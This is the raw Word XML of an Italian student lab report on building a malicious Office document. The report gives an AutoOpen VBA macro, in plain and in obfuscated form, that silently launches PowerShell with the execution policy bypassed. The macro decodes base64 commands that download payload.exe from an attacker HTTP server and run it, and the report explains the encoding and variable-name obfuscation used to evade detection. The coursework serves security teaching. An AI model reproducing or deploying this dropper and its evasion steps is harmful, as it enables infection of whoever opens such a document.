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Pr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>REPORT DOCUMENTO MALEVOLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0AF9C" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF8DCE0" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6004C7" w14:textId="257D8F29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Nome Cognome</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Farina Christian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA03550" w14:textId="75E93E31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Matricola</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> VR501577</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0AFDCD" w14:textId="5C9AB962" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="00387493">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Email</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> christian.farina@studenti.univr.it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1FCD1" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D217D35" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC7F742" w14:textId="4B7B28E8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t>COMANDO POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5717B" w14:textId="6F609D0D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 xml:space="preserve">In questa sezione dovete presentare il codice del comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Powershel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e le tecniche adottate per codificarlo in base 64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214A3C87" w14:textId="294E138B" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9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MANDI POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88179F" w14:textId="5ACD921B" w:rsidR="001C0B72" w:rsidRPr="00D1660C" w:rsidRDefault="001C0B72" w:rsidP="003D71C6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Mi collego al server creato con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e scarico il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8DF82" w14:textId="616CDD2F" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pP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= "(New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>('" &amp; "http://</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ipattaccante</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>porta</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>/payload.exe" &amp; "', '" &amp; "</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">percorso\dove\voglio\salvare\virus.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>" &amp; "')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67A99D" w14:textId="0908738D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comandoDaEseguire2= " &amp; 'percorso\dove\è\salvato\virus.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D8C1B" w14:textId="42778151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7CCCD5DD" w14:textId="536A41F0" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r w:rsidRPr="00D1660C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40197322" w14:textId="315A4315" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r w:rsidRPr="00D1660C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Pr="00D1660C" w:rsidRDefault="003104B9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TECNICHE DI CODIFICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF0FB1" w14:textId="383BA465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Per la codifica ho utilizzato due metodi in VBA che codificano stringh</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> date in input, in un contest reale le stringhe sarebbero state date</w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>direttamente codificate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come input </w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> decodificatore di </w:t>
      </w:r>
      <w:r w:rsidR="00D1660C" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>VBA; tuttavia,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>motivi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> didattici ho inserito I due metodi all’interno del codice del file malevolo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per mostrarne il funzionamento. Il programma infatti esegue I seguenti passaggi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9E15E" w14:textId="1A284A3F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1</w:t>
      </w:r>
      <w:r w:rsidR="003104B9" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Codifica le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5049C" w14:textId="3DC70129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2</w:t>
      </w:r>
      <w:r w:rsidR="003104B9" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Decodifica le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597405E" w14:textId="6C0E2C01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3</w:t>
      </w:r>
      <w:r w:rsidR="003104B9" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esegue I comandi decodificati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E46305" w14:textId="6412F9CC" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC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METODI USATI PER CODIFICARE I COMANDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B188209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difica una stringa in input in base 64 e restituisce la stringa codificata</w:t>
      </w:r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D1660C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Imposta il testo del nodo con il comando da codificare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F8D17" w14:textId="77777777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dataType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "bin.base64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DCB4F" w14:textId="409A1ECC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nodeTypedValu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stringaABinario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D89FC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Restituisci il risultato della codifica base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257805B5" w14:textId="50481B66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EncodeBase64 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>objNode.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="087FB0BF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Libera l'oggetto XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC4783" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00D1660C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End </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="307E6A1D" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7724E844" w14:textId="3F09416D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nverte una stringa in input in dati binari</w:t>
      </w:r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lastRenderedPageBreak/>
        <w:t>VBA MACRO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D811E03" w14:textId="29ACF36C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il codice della macro prima che venga offuscato, le tecniche adottate per offuscare il codice e il codice della macro offuscato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7FE8B" w14:textId="1E0DDA00" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC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DICE MACRO</w:t>
      </w:r>
      <w:r w:rsidR="00B40B24" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NON OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF322E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Sub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>AutoOpen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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172510A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Dim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> codificato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03FC15DC" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>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scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157DF0F" w14:textId="39A7F5A1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</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E38">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>\Downloads\virus.exe" &amp; "')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53152667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eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679B859" w14:textId="10825613" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E38">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>\Downloads\virus.exe'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A22013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 xml:space="preserve">'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codificato in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7668B" w14:textId="701369A0" w:rsidR="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>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C878465" w14:textId="77777777" w:rsidR="001C0B72" w:rsidRPr="007E6D03" w:rsidRDefault="001C0B72" w:rsidP="007E6D03"/>
    <w:p w14:paraId="4615B524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>' decodifico i due comandi da base64 a normali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D30D5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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360105D1" w14:textId="4A8FD845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comandoDaEseguire2 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048E77C" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03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65DE3DD0" w14:textId="34A41DB0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19AE99EC" w14:textId="77777777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46155E57" w14:textId="26A5DBC5" w:rsidR="00B355D4" w:rsidRPr="00D1660C" w:rsidRDefault="00B355D4" w:rsidP="00B355D4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CODICE MACRO OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C347974" w14:textId="1B2AC759" w:rsidR="00D5452C" w:rsidRPr="00D1660C" w:rsidRDefault="00D5452C" w:rsidP="00B355D4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Nel codice offuscato ho inserito solo il metodo principale (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>AutoOpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">) passando al decodificatore direttamente le stringhe codificate in base64, in questo modo ho potuto eliminare </w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> due metodi responsabili della codifica delle stringhe. Per offuscare il codice ho usato VBA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Obfuscator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e ho diviso </w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> comandi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> in due stringhe, per aumentare la confusione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18280E65" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AutoOpen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCE56C" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim v38d2edd4076bb66acc2ee1b42bdb2336 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA4AEF" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim vr4573k99768ffgruighfjkgbgvghjjhg As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D97F7A" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim ca9d601c97cef483411de079bb9a3419b As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC3E32" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim jytfk6877hnhhjj89ong6rbgfghj66879 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAB398" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Dim m758f0834b3c6499700addb9b25f64906 As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8A73C" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">Set m758f0834b3c6499700addb9b25f64906 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VBA.CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A347A8C" w14:textId="70E66FF0" w:rsidR="00A536A2" w:rsidRDefault="00387493" w:rsidP="00A536A2">
      <w:r w:rsidRPr="00387493">
        <w:t xml:space="preserve">jytfk6877hnhhjj89ong6rbgfghj66879 </w:t>
      </w:r>
      <w:r w:rsidR="00A536A2">
        <w:t>= "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A536A2">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> Bypass -Command "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E06DB" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336 = "IEX([</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69C9AA" w14:textId="42EA5FCD" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">vr4573k99768ffgruighfjkgbgvghjjhg = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E38" w:rsidRPr="00CF6E38">
        <w:t>KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTkyLjE2OC40My4yMDk6ODAwMC9wYXlsb2FkLmV4ZScsICdDOlxVc2Vyc1xtYWx3YXJlXERvd25sb2Fkc1x2aXJ1cy5leGUnKQ==</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6A4AE2" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t xml:space="preserve">ca9d601c97cef483411de079bb9a3419b = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Replace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>v38d2edd4076bb66acc2ee1b42bdb2336, "BASE64_ENCODED_COMMAND", "ICYgJ0M6XFVzZXJzXGNyaXN0XERvd25sb2Fkc1x2aXJ1cy5leGUn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7AEEC" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; vr4573k99768ffgruighfjkgbgvghjjhg, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E6017" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>m758f0834b3c6499700addb9b25f64906.Run jytfk6877hnhhjj89ong6rbgfghj66879 &amp; " &amp; " &amp; ca9d601c97cef483411de079bb9a3419b, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B09095B" w14:textId="77777777" w:rsidR="00A536A2" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>Set m758f0834b3c6499700addb9b25f64906 = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D677C39" w14:textId="14B8A7FA" w:rsidR="00B355D4" w:rsidRPr="00B046EC" w:rsidRDefault="00A536A2" w:rsidP="00A536A2">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p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le macchine virtuali utilizzate per condurre l’attacco e come sono state configurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4770B8" w14:textId="73CF8303" w:rsidR="00B355D4" w:rsidRPr="00D1660C" w:rsidRDefault="00B355D4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ATTACCANTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D444A79" w14:textId="260A00C5" w:rsidR="00B355D4" w:rsidRPr="00D1660C" w:rsidRDefault="00B355D4" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>L’attaccante è la macchina Kali Linux usata a lezione</w:t>
      </w:r>
      <w:r w:rsidR="00196577" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
